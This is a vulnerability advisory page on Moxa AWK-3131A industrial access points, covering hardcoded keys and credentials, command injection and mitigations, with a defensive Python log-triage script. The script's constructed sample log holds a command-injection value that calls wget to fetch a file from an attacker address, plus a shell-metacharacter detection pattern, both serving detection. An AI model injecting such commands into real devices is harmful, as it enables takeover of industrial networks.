OTPulse

Moxa AWK-3131A Series Industrial AP/Bridge/Client Vulnerabilities

Jun 25, 2024
Summary

The Moxa AWK-3131A industrial access point series contains multiple critical vulnerabilities across all firmware versions: improper access control (CVE-2019-5136) allows low-privilege authenticated users to escalate to higher privileges; hardcoded cryptographic keys (CVE-2019-5137) enable decryption of captured network traffic; hardcoded credentials (CVE-2019-5139) provide direct administrative access; and multiple command injection flaws (CVE-2019-5138, CVE-2019-5140, CVE-2019-5141, CVE-2019-5142) allow authenticated attackers to execute arbitrary OS commands. A buffer overflow (CVE-2019-5143) may also be exploitable. Moxa has stated no firmware patch will be released for this end-of-life product line.

What this means
What could happen
An attacker with low-privilege access to an AWK-3131A device could escalate privileges, inject arbitrary commands to gain full control of the access point, decrypt network traffic using hardcoded keys, or leverage hardcoded credentials to bypass authentication entirely. This could allow an attacker to redirect traffic, intercept communications, or disable wireless connectivity in manufacturing or transportation networks.
Who's at risk
Manufacturing plants and transportation facilities that rely on Moxa AWK-3131A wireless access points for PLC communication, sensor networks, or vehicle telemetry should be concerned. Any facility using this device for industrial Ethernet bridging or client connections is at risk. Secondary concern: managed service providers or integrators who deployed these devices for customers.
How it could be exploited
An attacker with network access to the AWK-3131A's management interface or web interface can authenticate with default or low-privilege credentials, then exploit command injection flaws (CWE-78) to execute arbitrary OS commands with elevated privileges. Alternatively, captured encrypted traffic can be decrypted using the hardcoded cryptographic key, or hardcoded credentials can be extracted and used to gain direct administrative access.
Prerequisites
  • Network access to AWK-3131A management or web interface (typically port 80/443 or SSH port 22)
  • Low-privilege user credentials or default credentials
  • Knowledge of the hardcoded cryptographic key or credentials (publicly disclosed)
Tags: no patch available, remotely exploitable, low complexity exploitation, hardcoded credentials, hardcoded cryptographic key, default credentials, command injection, privilege escalation, CVSS 10 (critical)
Exploitability
Moderate exploit probability (EPSS 5.8%)
Affected products (1)
Product     Affected Versions   Fix Status
AWK-3131A   All versions        No fix (EOL)
Remediation & Mitigation
Do now
WORKAROUND: If replacement is not immediately feasible, segment the AWK-3131A onto an isolated management VLAN with strict firewall rules allowing only trusted engineering workstations; block all other network access.
WORKAROUND: If the device must accept remote management, enforce VPN or jump-box access and disable direct web/SSH access from the plant network.
Schedule — requires maintenance window

No firmware patch exists for this device, so there is nothing to install. Replacing the unit or re-addressing it onto an isolated management VLAN will interrupt the wireless links it serves, so schedule that work in a maintenance window and plan for process interruption.

HARDENING: Monitor the AWK-3131A for unusual command execution, traffic pattern changes, or failed authentication attempts.
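Both compensating controls above (the management-VLAN allowlist and the monitoring of failed logins and suspicious command activity) can be checked from logs you already collect. The script below is an added example written for this page, not OTPulse or Moxa code. It parses a constructed, simplified log format (the real AWK-3131A syslog layout and the firewall's export format are assumptions here, as are the 10.20.1.5 management address and the 10.10.50.0/24 engineering subnet) and raises three findings: an accepted flow to the AP's management ports from outside the allowlist, a burst of failed logins from one source, and shell metacharacters inside a web parameter value, which is the shape of the CWE-78 bugs in this advisory.

```python
"""Triage constructed AP/firewall logs for the signals the advisory asks you
to watch. Log format, addresses and thresholds are assumptions for this
example, not the AWK-3131A's real syslog output."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# --- policy (assumed values; adjust to the plant's addressing) ---
AWK_MGMT_IP = ip_address("10.20.1.5")            # the AP's management address
ENGINEERING_WS = [ip_network("10.10.50.0/24")]   # only these may reach mgmt ports
MGMT_PORTS = {22, 80, 443}
FAIL_THRESHOLD = 5                               # failed logins per source ...
FAIL_WINDOW = timedelta(minutes=2)               # ... within this window

# Characters needed to chain an OS command onto a parameter value (CWE-78),
# plus their URL-encoded forms. '&' is deliberately absent: it is the
# legitimate separator between parameters and is handled by splitting first.
SHELL_META = re.compile(r"[;|`]|\$\(|%3b|%7c|%26|%60|%24%28|%0a", re.I)

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<src_type>\w+): (?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample input: one legitimate engineering session, one host on the
# plant network reaching SSH, brute-forcing the web UI, then injecting a command.
SAMPLE_LOG = """\
2024-06-25T08:00:01Z plant-fw fw: src=10.10.50.11 dst=10.20.1.5 dport=443 action=accept
2024-06-25T08:00:05Z plant-fw fw: src=10.20.3.77 dst=10.20.1.5 dport=22 action=accept
2024-06-25T08:00:09Z awk-3131a-01 web: src=10.20.3.77 user=admin login=fail
2024-06-25T08:00:12Z awk-3131a-01 web: src=10.20.3.77 user=admin login=fail
2024-06-25T08:00:15Z awk-3131a-01 web: src=10.20.3.77 user=admin login=fail
2024-06-25T08:00:18Z awk-3131a-01 web: src=10.20.3.77 user=admin login=fail
2024-06-25T08:00:21Z awk-3131a-01 web: src=10.20.3.77 user=admin login=fail
2024-06-25T08:00:40Z awk-3131a-01 web: src=10.20.3.77 user=operator login=ok
2024-06-25T08:00:55Z awk-3131a-01 web: src=10.20.3.77 user=operator params="hostname=plc-gw;wget%20http://10.20.3.77/x"
2024-06-25T08:01:10Z awk-3131a-01 web: src=10.10.50.11 user=admin params="hostname=plc-gw-02&ntp=10.10.50.2"
"""


def parse_line(line):
    """Split one log line into a dict of fields; None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = {"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
          "host": m["host"], "type": m["src_type"]}
    for key, value in KV_RE.findall(m["rest"]):
        ev[key] = value.strip('"')
    return ev


def analyze(lines):
    """Return a list of (finding_kind, detail) tuples in log order."""
    findings = []
    fails = defaultdict(list)  # source ip -> timestamps of recent failed logins
    for line in lines:
        ev = parse_line(line)
        if ev is None or "src" not in ev:
            continue
        src = ip_address(ev["src"])

        # 1. Segmentation check: an accepted flow to the AP's management ports
        #    from outside the engineering allowlist means the VLAN/firewall
        #    workaround is not actually enforced.
        if ev["type"] == "fw" and ev.get("action") == "accept":
            if (ip_address(ev["dst"]) == AWK_MGMT_IP and int(ev["dport"]) in MGMT_PORTS
                    and not any(src in net for net in ENGINEERING_WS)):
                findings.append(("segmentation-violation",
                                 f"{src} -> {ev['dst']}:{ev['dport']}"))

        # 2. Failed-login burst against the web UI or SSH; alert as the
        #    threshold is crossed within the sliding window.
        if ev["type"] in ("web", "ssh") and ev.get("login") == "fail":
            window = fails[src]
            window.append(ev["ts"])
            while window and ev["ts"] - window[0] > FAIL_WINDOW:
                window.pop(0)
            if len(window) == FAIL_THRESHOLD:
                findings.append(("auth-failure-burst",
                                 f"{src} {len(window)} failures within {FAIL_WINDOW}"))

        # 3. Shell metacharacters inside any single parameter value.
        if ev["type"] == "web" and "params" in ev:
            for pair in ev["params"].split("&"):
                value = pair.partition("=")[2]
                if SHELL_META.search(value):
                    findings.append(("cmd-injection-pattern",
                                     f"{src} user={ev.get('user')} value={value!r}"))
                    break
    return findings


if __name__ == "__main__":
    for kind, detail in analyze(SAMPLE_LOG.splitlines()):
        print(f"{kind:24} {detail}")
```

Feed it the device's and firewall's real export format by adjusting LINE_RE and the field names; the three checks themselves do not depend on the vendor format. The parameter check splits on `&` before looking for metacharacters so a normal multi-field form post is not flagged, while an encoded `%26` inside a value still is.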
Mitigations - no patch available
AWK-3131A has reached End of Life. The vendor will not release a patch. Apply the following compensating controls:
HARDENING: Do not deploy AWK-3131A devices in environments requiring high-security wireless access; consider replacement with a current-generation industrial access point from Moxa or a competitor with active security support.
API: /api/v1/advisories/fa685a58-5dca-46b7-a101-8456eaf21d0e